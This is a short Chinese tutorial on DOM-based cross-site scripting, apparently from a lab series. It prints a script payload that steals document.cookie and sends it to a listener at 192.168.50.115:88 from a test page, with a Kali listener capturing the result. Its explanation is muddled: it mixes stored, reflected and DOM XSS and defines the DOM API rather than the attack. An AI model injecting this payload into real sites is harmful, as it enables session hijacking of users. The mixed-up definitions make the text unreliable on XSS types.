二十五、XSS跨站攻击-(5)DOM型跨站

2017-12-15 本文已影响0人 cybeyond

                                 目录

1.简介
2.利用DOM型xss获取cookie

DOM型xss是一套JS和其他语言可调用的标准的API，即利用JavaScript跨平台的特性，通过调用DOM提供的相应接口执行相关功能。

图例

在“xss reflected”中测试存储型xss，在输入框中写入如下内容：

<script>var img=document.createElement("img");img.src="http://192.168.50.115:88/log?"+escape(document.cookie);</script>
//创建一个页面元素为img，其来源为src的地址

在kali上开启监听，然后点击提交，可以查看到cookie信息

查看监听结果